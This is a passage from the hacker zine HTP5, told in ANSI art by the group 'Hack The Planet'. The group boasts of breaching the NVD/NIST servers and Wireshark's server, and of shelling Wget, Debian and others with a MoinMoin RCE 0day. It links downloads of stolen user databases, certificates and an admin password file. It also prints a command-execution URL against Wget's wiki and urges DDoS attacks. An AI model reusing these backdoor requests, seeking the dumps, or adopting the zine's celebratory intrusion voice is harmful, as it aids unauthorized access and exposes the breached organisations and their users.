░▒▒▓▓▒▒▒▒▒▒░░░░░░░░░░░▒▒▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒▒ ░▒▓▓▓▓▓▓▓▓▓▓▒▒▒▒░░░░▒▒▓▓▓▓▓▓▒▒░▒▒▓▓▓▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▒ ▓▓▓▒▓▓▓▓▓▓▓▓▓▓▒▒░░░░▒▓▓▓▓▓▓▒▓▄▓▓▓▓▓▓▓▒▒░░░▒▒▒▒▓▓▓▓▓▓▓▓▓░ ▒▓▓▓▓▓░▒▒▓▓▓▓▓▓▒░ ░▒▒▒▒▒▒▒░░▒▒▒▒▓▓▒▒▒▒░░░▒▒▒▒▓▓▓▓▓▓▒▒▒░ ▒▒▓▓▓▓▄▓▓▓░░▒▒▒▒░ ░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▒░▒░ ▒▒▒▓▓▓▒▒▓▒▒░░▒▒▒░░░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▒▒▒░ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░░░░░░░░░ ░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▓░ ▒▒▒▒▒▒▒░░░░▒▒░░░ ░░░░░▒▒▒▒░░ ░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓░ ▒ ▒▒▒░░░░░░░░▒░░░░ ░░ ░░▒▒▓▒▒▒▒░░ ░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒ ▒░░░░░░░░░▒▒▒▒▒░░▒▒▓▓▓▓▓▓░░░░▒▒░░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓ ▒▒░░░░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒░░░░▒▒▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒ ▒▒▒▒▒░░░░░▒▓▓▓▓▓▓▓▒▓▒▒▒▒▒▒▒▒▓▓▓▓▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▒ ▒▒▒▒▒▒░░▒▒▓▓▓▓▒▒▒░░░░░▒▒▒▒▒▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█████▓▓▒ ▒▒▒▒▒▒▒▓▓▓▒▒▓▓▒▒▒░░░░░░▒▒▓▓▓▒▒▒▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒███████▓▓▒▒ ▓▓▓▓▓▓▓▓▓▓▓▓▓▒░ ░░▒▒▒░░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓░░▓█████████▓▓▓▒ ▓▓▓▓▓▓▓▓▒▓▓▒▒░ ░░░░░░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ ▒██████████████ ▓▓▓▓▒▒▒▒▒▒▒░░░ ░░▒▒▒░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▒ ▓██████████████ ▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓░ ░▓██████████████ ▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓░ ▓▓██████████████ ▓▓▓▓▒▒▒▒░░░░░░░░░░░▒▒▓▓▓▓█▓▓▓▓▓▓░ ▒▓███████████████ ▓▓▓█▓▓▓▒▒▒▒░░░░░░░░▒▒▓▓▓▓▓█▓▓▓▓▒░ ░▓▓███████████████ ▓▓▓███████▓▓▓▓▓▓▓▒▓▓▒▓▓▓▓▓▓██▓▓▓▓▒ ░▓▓████████████████ ▓▓████████████▒▒▓▓▓▓▓▓▓▓▓▓████▓▓▓▒░ ▓▓█████████████████ ▓▓▓███████████████▓ ░▒▓▓▓██████▓▓▓▒ ▓▓██████████████████ ▓▓▓████████████████████▒ ░▒▓▓▓██▓▒ ▓▓███████████████████ ▓▓▓███████████████████████▓░ ░▓▒ ▒▓▓███████████████████ ▓▓▓▓███████████████████████████▒ ▓▓▓ ▒▓█████████████████████ ▓██████████████████████████████▓░ ▓▓▓▓▒ ░▓▓█████████████████████ ███████████████████████████████▓░ ▓▓▓▓▓░▓░ ▓▓▓█████████████████████ ███████████████████████████████▓ ░▓▓▒▒▓▒▓▓▒ ▓▓▓██████████████████████ ███████████████████████████████░ ▒▓▒▒░▓▓▓░ ▒▓▓███████████████████████ ███████████████████████████████▒ ▓▓▒░░▓▓░ ░▓▓████████████████████████ ███████████████████████████████▒ ░▒▒▒▓▓▓▓▒ ░▓▓█████████████████████████ ██████████████████████████████▓▓ ░▒▓▒▓▓▓▒▒▒ ▓▓██████████████████████████ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ▄▄ ▄▄ ▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄ ▄▄ ▄ ▄ ▄▄▄ ███▄ ██ █ █▄▄▄ █ ▄▄▄ ███▄ ██ █ █ █ █ HTP5 ██ ▀█▄██ █ ▄▄▄█ █ ██ ▀█▄██ ▀▄▀ █▄▄▀ ██ ▀██ ██ ▀██ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ GILL However, we have come to believe that one 'HTP' is involved in the NVD breach. They or perhaps an accomplice of theirs have a disk that Mr. Belford needs. We want you to help us find it. \ ░░▒▒▓▓▓▓▓▓▓▓▓▒▒░░ ░▒▓███████████████████▓▒░ ░▒▓█████████████████████████▓▒░ ░▓████████▓▓▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓█████▓ ░▓█████▓▓▓▓▒▒▒░░░░░░░░░░▒▒▒▒▒▓▓▓███▓ ░▓████▓▓▓▒▒▒▒▒▒▒░░░░ ░░░░░▒▒▓▓▓██▓ ▓████▓▓▒▒▒▒▒▒░░░░ ░░▒▒▒▓▓▓██▒ ▒████▓▓▓▒▒▒▒▒░░░ ░▒▒▒▓▓▓██ ▓████▓▓▒▒▒▒▒▒░░░ ░░▒▒▒▓▓▓█░ █████▓▓▒▒▒▒▒░░░ ░░▒▒▒▓▓█▒ ████▓▓▒▒▒▒▒▒▒▒▒░░ ░░▒▒▒▒▓▓▓▓ ███▓▓▒▒▒▒▒▒▒░░░ ░░░░▒▒▒▓▓▓▓ ▓█▓▓▓▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▄░ ░▄▓▓▓▓▓▓▓▓▓█▓▓▓ ▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓▓▓▓█▒▓▒▓▒▓▓▓▓▓▓▓▓▓▓█▓█░ ▒▓▓▓▓▒▒░░▒█▓▓▓▓▓▓▓▓▓▓█░▒░░▒▓▓▓▓▓▓▓▓▓▓▓█▓▓ ░▒▓▓▒▒▒▒░░▒▒█▓▓▓▓▓▓▓▓▓█░▒░░░▒▓▓▓▓▓▓▓▓▓▓█▒▓░ ▒▒▒▒▒▒▒▒▒▒▒░░▀▀▀▀▀▀▀ ░▒░░ ░▒▒▒▀▀▀▀▀▀▒▓▓▓▒ ░▒▒▒▒▒▒▒▒▒░░ ░░░ ░░▒ ░░▒▒▒▓ ▒▒▒▒▒▒▒▒▒▒▒░ ░░░░░ ░░░░░ ░░▒▓▒ ░▒▒▒▒▒▒▒▒▒░ ░░░░░ ░▒░░░ ░▒▒▓ ░▒▒▒▒▒▒▒▒░░░░ ░░░░▒▒▒▒░░░░░▓▓▒░░ ░░░▒▓▓ ░░▒▒▒▒▒▒░░░░░░▒▒▓▒░░░░░░░░░░░▒▓▓▓▒░░▒▒▓▓▓░ ░▓▒▒▒▒▒░░░░░░░▒▓▓▒░░░ ░░▒▓▓▓▓▒▒▒▓▒▓░ ▓▓▓▒▒▒▒░░░░░░▒▓▒░░ ░░░░ ░░░░░▒▒▓▓▒▒▒▒▒▓ ▓▓▓▓▒▒▒░░░▒▒▒▒░ ░░▒▒▓▒▒▒▒▒░░▒▒▒▒▓▒▒▒▒▓▒ ▓▓▓▓▓▒▒▒▒▒▒▒▓▒ ░░░░░░░░ ░▒▒▒░░▒▓▒▒▓▓ ▒▓▓▓▓▓▒▒▒▒▒▒▓▒░░░░ ░░░░░░░▒▒▒▒▓▓▒▓▓▒ ░░▒▒▓▓▓▓▒▒▒▒▒▒▓▒░░░ ░░▒▒▓▓▓▓▓▓▓ ░ ▒▒▓▓▓▓▒▒▒▒▒▓▓▒▒░░░ ░░▒▒▒▒▓▓▓▓▒▓ ░▒ ░▒▒▓▓▓▓▒▒▒▒▓▓▒▒▒░ ░▒▒▒▓▓▒▓█▓▒ ░░ ░██░ ░▒▒▓▓▓▓▒▒▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▒▓▓▓▓▒ ░ ▒████░ ░▒▒▓▓▓▒▒▓▓▓███████▓▓▓▓▓▓▓▓▒ ▓▒░ ▒▓██████▒ ░▒▒▓▓▓▓▓▓▓█▓▓▓██▓▓▓▓▓▒▒▒ ▓███▓▓▒▒░░ ░▒▓██████████▓ ░░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒ ░██████████▓▓▓▒▒░░ ░▒▓███████████████▓ ░░░░▒▒▒▒▒▒▒▒░░▒░ ▒█████████████████▓▓▒ ░▒▓▓████████████████████▓░ ▓▓▓▓░▓▓▓░░░ ████████████████████ ██████████████████████████▓░ ▓▓▓▓▓▓░ ▒███████████████████ ████████████████████████████▒ ▓▓██ ▓██████████████████ █████████████████████████████▒ ████ ░██████████████████ ██████████████████████████████▒ ▀████ ▒█████████████████ ███████████████████████████████▓ █████ █████████████████ ████████████████████████████████▓ ██████ ▒████████████████ █████████████████████████████████▓ ███████ ▓███████████████ ██████████████████████████████████▓░ ████████ ░▓██████████████ ████████████████████████████████████░ ▓████████ ▒██████████████ █████████████████████████████████████░ █████████ ██████████████ ██████████████████████████████████████▒ █████████ ▓█████████████ ███████████████████████████████████████▒ ██████████ ░█████████████ ████████████████████████████████████████▓ ▒██████████ ▓████████████ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ About 8 months ago, we were monitoring our intel (tail -f'ing PM logs from other networks) and came across an individual who was pretty skilled with ColdFusion. After due time, we invited him/her to HTP. He/she ended up manifesting the NULL RDS 1day POC, which owned the NVD. The NVD realized they were breached, and deleted the shells. Soon after, they were shelled again. They deleted the shells again. Once again, they were shelled. The DHS CSD was swift and unrelenting with their execution of the DELETE key. As fun as this was, the rest of HTP acknowledged what had been breached. We switched tactics and proceeded to traverse the National Vulnerability Database network. Two boxes down, we downloaded the CFM scripts and certificates hosted within the NVD and NISTWEB servers. From them, we were able to authenticate ourselves to access the DHS NIST/NVD user database (root slash period workspace slash period garbage period). Not knowing what to do, and realizing their DELETE key training had abandoned them, the DHS CSD resorted to shutting the entire site down. It is our theory their inspiration for this technique came from an NCIS episode: http://www.youtube.com/watch?v=u8qgehH3kEQ Included in this segment of HTP5 is the DHS NIST/NVD user database, along with two certificates and their ColdFusion admin password.properties. Enjoy. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ~ http://mirror.hack-the-planet.tv/HTP-5/NVD/NVD.zip |- 0MB | DHS NIST/NVD user database, two certs, CF admin password.properties ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ███ ███ ▄████ ▄▄████▄▄ ███ ███ ███ ███ ▄█████ ▄██▀ ▀██▄ ███ ███ ███ ███ ▄██▀███ ███ ███ ███ ███ ██████████ ▄██▀ ███ ███ ███▄███ W ███ ███ ▄██▀ ███ ███ ████████ I ███ ███ ▄██▀ ███ ███ ███ ███ ████ R ███ ███ ▄██████████ ▀██▄ ▄██▀ ███ ████ E ███ ███ ▄██▀ ███ ▀▀████▀▀ ███ ████ S H A _____ R ███████████ ███ ███ ██████████ ,-:` \;',`'- K ███ ███ ███ ███ .'-;_,; ':-;_,'. ███ ███ ███ ███ /; '/ , _`.-\ ███ ██████████ ███████ | '`. (` /` ` \`| ███ ███ ███ ███ |:. `\`-. \_ / | ███ ███ ███ ███ | ( `, .`\ ;'| ███ ███ ███ ███ \ | .' `-'/ ███ ███ ███ ██████████ `. ;/ .' `'-._____.-'` ███████▄▄ ███ ▄████ ███▄ ███ ██████████ ███████████ /""-._ ███ ▀██▄ ███ ▄█████ ████▄ ███ ███ ███ . '-, ███ ███ ███ ▄██▀███ █████▄ ███ ███ ███ : '', ███ ▄██▀ ███ ▄██▀ ███ ███▀██▄ ███ ███████ ███ ; * '. ███████▀▀ ███ ▄██▀ ███ ███ ▀██▄███ ███ ███ ' * () '. ███ ███ ▄██▀ ███ ███ ▀█████ ███ ███ \ \ ███ ███ ▄██████████ ███ ▀████ ███ ███ \ _.---.._ '. ███ ████████ ▄██▀ ███ ███ ▀███ ██████████ ███ : .' _.--''-'' \ ,' .._ '/.' . ; ; `-. , \' ; `, ; ._\ ; \ _,-' ''--._ : \_,-' '-._ \ ,-' . '-._ .' __.-''; \...,__ '. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 0x06 ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄.' _,-' \ \ ''--.,__ '\ / _,--' ; \ ; "^.} For the final segment of HTP5, we present: Wireshark. ;_,-' ) \ )\ ) ; / \/ \_.,-' ; Debian, Python, Wireshark, Mercurial, MoinMoin, and Wget / ; were all compromised by moinmelt.py, our RXE 0day for ,-' _,-'''-. ,-., ; MoinMoin (included in HTP5). Hell, Wget is still ,-' _.-' \ / |/'-._...--' shelled. Would someone please update them? It's been :--`` )/ months by now: http://wget.addictivecode.org/Wget?action=moinexec&c=uname%20-a We had our sights set on backdooring Mercurial, which would land us shells on UnrealIRCd (3rd time!), Firefox, QuakeNet, Pidgin, and Debian repositories. However, we were more interested in having fun, so instead we dropped into Wireshark's server. After 24 hours, Wireshark's server 'splash' returned a shell. It featured a 3.7 kernel and an Apache httpd, which hosted both the blog and the wiki. Permissions were read-world on the config files, and we couldn't help ourselves. We then proceeded to monitor Wireshark's www-data mail, as well as download their user databases. All of the above is included in the concluding segment of HTP5. Enjoy your corporate security access. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ~ http://mirror.hack-the-planet.tv/HTP-5/Wireshark/wireshark.zip |- 1.3MB | 31MB compressed Wireshark data ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ █ █ ▄ ▄ ▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ HTP5 █ █ █ █ █ █▄▄█ █ █ █▄▄▄█ █▄▄█ █ █ ▀▄ █▄▄█ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ We've come a long way since we first showed up on the Scene. Current and past crew of Hack The Planet, we appreciate your kickass effort that got us to this point. Since our inception, we have unfortunately witnessed a few of our crew members getting arrested. To them, we regret what has transpired, and wish you all the best beyond HTP. This zine, like all of the others, has been a blast to create. Those interested can check out http://straylig.ht/ for past releases. Here's to two years of HTP, everyone. Remember; relax, have fun, be the best, and DDoS Anonymous on sight. Hack the Planet! Shout Outs To: > ACiD (colored ANSI) . . H . ░▓▓▓▓▓▓▓▓▓▓▓ . P ▒▓█▀▀▀██████░ T ░▓▓▓▓▓▓▓▓▓▓ ▒▓█ ████▀▄▀█░░▓▓▓▓▓▓▓▓▓▓▓ ▒▓█▀▀▀█████░ ▒▓█ ▀▀██████░▒▓█▀▀▀██████░ ▒▓█ ▀▄█████░ ▒▓██▀▀▀███▀█░▒▓█ ▀ ██▄▄██░ ▒▓█ ▀ ███▄█░ ▒▓██ ▀ █████░▒▓█ █ ██████░ ▒▓██▀█▀████░ ▒▓██ ▄▀█████░▒▓███▀██▀███░ ▒▓██ █ ████░ ▒▓███▀▀▀████░▒▓███ ▀ ███░ ▒▓██ ▀ ████░ |▒▓███ ▀ ████░▒▓███ █▄ ███░ ▒▓▓▒▓▓▓▓▓▓▓▓▓ ▒▓███ █ ████░▒▓█████▀▀███░ ▒▓█▒▓█▀▀▀████░ |▒▓████▀▀▀███░▒▓█████ ▄ ██░ ▒▓█▒▓█ ▀ ███▄░ \ |▒▓████ ▀▀███░▒▓█████ █ ██░ ▒▓█▒▓█ ▄▀████░ \ ▒▓████▀▀ ███░▒▓█████▄▄███░ ▒▓█▒▓██▀██▀██░ ,-'`▒▓█████▀█▀██░▒▓██████████░ ▒▓█▒▓██ ▀ ██░ ,` ▒▓█████ ▀ ██░▒▓██████████░ ▒▓█▒▓██ █▄ ██░░ ▒░ / ▒▒▓█████ █ ██░▒▓██████████░ ▒▓█▒▓██████▀█░░▒ ▒ ▒▒▓ ▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▓█████████▒▒▒▓██████████░ ▒▓█▒▓████████░░▒▒ ░▒ ░▒ ▒▒▓ ▓▒▒▒▒--▒▒░-- ▒▒ ▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓░░░░░░░░▒▓████████░░▒▒▒▒▒ ░▒▒ ▒▒▒▓ ▒ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓▓▓░░░░░░▒▓████████░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀EOF